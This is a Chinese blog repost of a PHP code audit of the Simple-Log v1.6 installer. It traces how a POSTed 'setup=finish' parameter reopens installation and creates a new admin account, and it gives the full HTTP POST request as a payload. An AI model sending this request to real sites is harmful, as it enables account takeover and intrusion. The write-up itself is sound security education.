mac搭建php审计环境,[php审计实战篇]Simple-Log v1.6 安装逻辑问题

最新推荐文章于 2021-07-28 15:23:35 发布
最新推荐文章于 2021-07-28 15:23:35 发布
阅读量134 收藏
点赞数
文章标签: mac搭建php审计环境
本文详细分析了Simple-Log博客系统的安装过程,揭示了一个允许绕过安装完成检查的漏洞。通过操纵$setup参数,攻击者可以重新执行安装步骤,包括设置数据库连接和创建管理员账户。虽然实际利用需要已知数据库凭据,但这个案例展示了安装逻辑错误的潜在风险。
摘要由CSDN通过智能技术生成

本帖最后由 Aedoo 于 2018-1-2 08:17 编辑

0x00 代码跟踪

首页,index.php:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.png (25.21 KB, 下载次数: 95)

2017-12-18 23:51 上传首先包含php文件:/includes/core.php

8f3ff2fbfdd7c7c8339951a6542705fa.gif

2.png (42.36 KB, 下载次数: 102)

2017-12-18 23:51 上传

第9、11行代码:

[PHP] 纯文本查看 复制代码define('SLSYS',defined('SAE_TMP_PATH')?'SAE':'NORMAL');

//定义博客系统的运行环境

require(PBBLOG_ROOT.'/includes/'.SLSYS.'.core.php');

如果定义过SAE_TMP_PATH变量,则SLSYS为SAE。

但是博客并未安装过,SLSYS会被赋值为NORMAL。

因此第11行会包含文件:/includes/NORMAL.core.php

继续跟踪:/includes/NORMAL.core.php

8f3ff2fbfdd7c7c8339951a6542705fa.gif

3.png (60.59 KB, 下载次数: 103)

2017-12-18 23:51 上传

第22行:先判断/home/data/config.php文件是否存在,如果存在包含此文件。

但实际未安装之前此文件并不存在,而33行的$install_lock变量是在此文件中定义的。

所以会进入if循环,从而跳转到安装界面。

0x01 漏洞分析

假设现在已经成功安装了Simple-Log博客。

此时已经存在/home/data/config.php文件,并且已被包含,$install_lock=true。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

4.png (39.59 KB, 下载次数: 93)

2017-12-18 23:51 上传

第59行:此时需要$setup参数不等于finish,才会满足条件并且跳转到博客首页。

第52行:如果POST进入的参数setup不为空,则setup被赋值为POST值,反之会被赋值为check。

所以这两个处代码导致了$setup参数可控,可直接POST参数: setup=finish

会直接进行安装的最后一步。

下图为进入$setup=finish的代码,接收host、dbuser、dbpass等POST进的参数并连接数据库:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

5.png (97.94 KB, 下载次数: 95)

2017-12-18 23:51 上传

一同POST进入的值还有管理员账户以及密码等,随后会插入到数据库

8f3ff2fbfdd7c7c8339951a6542705fa.gif

6.png (57.4 KB, 下载次数: 98)

2017-12-18 23:51 上传

给出Payload:(可点击纯文本查看)

[AppleScript] 纯文本查看 复制代码POST /simplelog/install/index.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 119

Cookie: PHPSESSID=2h2vr0hj990r37p9pfj6qlluv7

Connection: close

Upgrade-Insecure-Requests: 1

setup=finish&host=localhost&dbname=simpletest&dbuser=root&dbpass=root&admin_user=admin&admin_pass=123456&blogname=simple

代码区域会被转码,可点击纯文本查看,下面也给出图片:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

7.png (29.07 KB, 下载次数: 112)

2017-12-18 23:51 上传

测试成功:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

8.png (75.12 KB, 下载次数: 108)

2017-12-18 23:51 上传

0x03 小结

虽然此处安装逻辑问题比较鸡肋,因为你并不知道数据库管理员用户名以及密码。

但是作为安装逻辑的案例,还是比较好的。

0x04 环境以及源码下载

审计工具:PHPStorm

审计环境:phpStudy

源码分享:

fee66f979b5055a8ac528ddbc4edaeca.gif

Simple-Log-v1.6.20120201.zip

(561.05 KB, 下载次数: 6, 售价: 3 魔法币)

2017-12-18 23:54 上传

点击文件名下载附件

售价: 3 魔法币 [记录]

下载积分: 魔法币 -5

耗奇心
关注
代码执行php代码审计1
m0_55772907的博客
04-30 987
(1)原理 当应用在调用一些能将字符串转换成代码的函数时,没有考虑到用户是否能够控制这个字符串传入一些恶意代码,将造成代码注入漏洞。应用有时候会考虑代码的简洁性,灵活性,会在代码中调用 eval之类的函数。 (2)函数 1)php eval() //把字符串作为PHP代码执行 assert() //检查一个断言是否为 FALSE,可用来执行代码 preg_replace() //执行一个正则表达式的搜索和替换 call_user_func()//把第一个参数作为回调函数调用 cal...
mac搭建php审计环境,[docker]搭建一个本地代码审计环境(docker-compose——nginx + php5 + mysql)...
weixin_30768103的博客
04-07 368
搭建一个本地代码审计环境(docker-compose——nginx + php5 + mysql)看到最新Xiaocms爆了CVE,想审计一波所以打算用docker-compose搭一个本地的平台分享一下我是怎么搭建的nginx + php5 + mysql(其实一开始搭了7.2的,Xiaocms不支持php7。)目录结构.├──app│└──info.php├──files│...
phpstorm mac环境配置_PHP代码审计(环境搭建)
weixin_39861255的博客
11-23 220
phpstudyphp:Apache:MySQL:phpstorm:php手册:phpstorm常用设置:1. 项目的编码方式2. 更改单个文件的编码方式3. 配置php解释器4. 配置本地服务器工具===>部署===>配置:5. 配置调试(Xdebug)环境修改php.ini:修改完成后,重启phpstudy!phpstorm中配置Xdebug:https://www.jetbrai...
代码审计工具_「基础篇」PHP代码审计
weixin_39534121的博客
12-08 344
本文由重生信息安全:主体编写,如有不当,还望斧正。关于工具:Rips 是使用PHP语言开发的一个审计工具,所以只要大家有可以运行PHP环境就可以轻松实现PHP代码审计,如果大家感兴趣可以自行了解官网http://rips-scanner.sourceforge.net/关于下载:环境我这里用的PHPstduy,下载RIPS后将其解压放入PHPstduy的根目录下即可使用 ,浏览器访问local...
PHP代码审计————1、PHP代码审计环境搭建
Fly_鹏程万里
04-04 1047
前言本系列博客,主要讲解PHP代码审计。从环境搭建到具体的实战分析将会一步一步深入学习,希望可以对大家有所帮助。审计环境搭建操作系统:Window 7软      件:phpstudy、VMware workstations14、seay 代码审计软件、notepad++(1)在本地物理主机中安装VMware workstations 14(2)使用虚拟机在本地创建Windows 7操作系统的虚拟...
Simple-Log v1.6 正式版 build 20130104
05-10
"Simple-Log v1.6 正式版 build 20130104" 是一个基于PHP的简单日志记录系统。这个版本发布于2013年1月4日,它提供了轻量级的日志管理功能,适合那些需要在PHP环境中追踪程序运行状态的开发者使用。作为博客日记的...
Simple-log PHP博客 v1.6
05-12
摘要:PHP源码,博客日记,Simple-log,博客,Blog SimpleLog是基于Smarty模板引擎编写的一套界面简洁的博客... Simple-Log v1.6 功能更新:  1.SAE版本与正常版本合二为一,以后程序可以再SAE通用,无需移植  2.加入
Simple-Log 1.6 build 20130104.zip
05-24
Simple-Log 1.6 build 20130104 更新日志: 1.修改已知程序bug 2.改进系统构架,让程序变得更简洁 主要功能特性: 简单易用: 这是一个简便易用的功能强大的系统,在后台没有复杂的菜单,使用起来方便快捷 ...
Simple-Log v1.3.2 For Sina SAE.zip
07-07
Simple-Log是基于PHP MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性。 Simple-Log v1.3.2 For Sina SAE适应于新浪云平台 Simple-Log安装 如果您是新用户,请您直接在...
Simple-Log v1.3.2 For Sina SAE
10-25
Simple-Log是基于PHP+MySQL的开源免费博客...Simple-Log v1.3.2 For Sina SAE改进功能:修复日志归档错误,写等更新操作直接从MySQL主数据库操作,从MySQL从数据库读取数据,提高博客系统性能,去除首页检测是否安装
maccms代码审计
weixin_30872337的博客
06-12 485
由于工作原因,分析了很多的cms也都写过文章,不过觉得好像没什么骚操作都是网上的基本操作,所以也就没发表在网站上,都保存在本地。最近突然发现自己博客中实战的东西太少了,决定将以前写的一些文章搬过来,由于当时写的初4是给自己留个记录,以后方便查看,所以写的都很简单,只有代码审计和复现,没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的 maccms7.x前台盲注 user/index.p...
maccms代码审计——前台sql注入漏洞
willow_liang的博客
11-06 2038
漏洞存在路径:C:\phpstudy\WWW\maccms\inc\common\function.php第572行的htmlEncode函数 审计过程: 1.在C:\phpstudy\WWW\maccms\inc\module\vod.php93-98 2.跟进图中的be方法
php代码审计环境搭建与图文配置PhpStorm+Xdebug)
baola的博客
08-28 2263
本文用phpstudy搭建zzcms站点,PhpStorm+Xdebug进行详细代码审计
代码审计》,了解一下
好好学习,天天向上
07-14 2120
代码审计:企业级web代码安全架构 #代码审计
 对源代码进行检查,寻找代码中的bug,代码审计是企业安全运营以及安全从业者必备的基础能力 黑盒测试:功能测试,不接触代码的情况下测试系统的功能是否有bug,是否满足设计需求 白盒测试: 就是代码审计,以开放的形式从代码层面寻找bug 代码审计系统 seay源代码审计系统 RIPS基于php开封的针对php代码安全审计的软...
PHP自动化代码审计工具
内心不种满鲜花就会长满杂草
07-28 8816
目录 Seay Fortify RIPS Seay Seay源代码审计系统是一款绿色免费的Seay源代码审计软件。软件功能强大,提供了一键自动审计,函数查询,代码高亮编辑器,自定义审计规则,代码调试等强大功能 下载地址:链接:https://pan.baidu.com/s/1x_JIm5HYizNXkmc22GBFbg ,提取码:wfr7 使用方法 导入之后,在左边会有源码文件的预览,默认综合模式为函数,然后点击综合扫描,下面就会显示可能存在漏洞的文件与具体位置 我们发现,综合模.
自动化代码审计工具
weixin_30756499的博客
07-14 3453
三款自动化代码审计工具 0×01 简介 工欲善其事,必先利其器。 在源代码的静态安全审计中,使用自动化工具代替人工漏洞挖掘,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。在学习PHP代码审计的过程中,本人搜集使用了多款自动化工具。本文将简要介绍其中三款比较实用的工具:RIPS、VCG、Fortify SCA。 RIPS是一款开...
PHP网站常见安全漏洞及防御方法
weixin_34296641的博客
08-01 322
目前,基于PHP的网站开发已经成为目前网站开发的主流,本文笔者重点从PHP网站攻击与安全防范方面进行探究,旨在减少网站漏洞,希望对大家有所帮助! 一、常见PHP网站安全漏洞 对于PHP的漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。 1、sessio...
薄板切割成型机_包括零件图_机械3D图可修改打包下载.rar
最新发布
09-29
薄板切割成型机_包括零件图_机械3D图可修改打包下载.rar
PHP数据采集:Snoopy与simple_html_dom实战解析
"这篇教程深入探讨了PHP数据采集技术,主要介绍了两个实用的PHP库——Snoopy和simple_html_dom。作者强调了虽然PHP自身有几种内置方法可用于数据采集,但利用这些工具可以让采集工作更加简便。Snoopy是一个PHP类,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值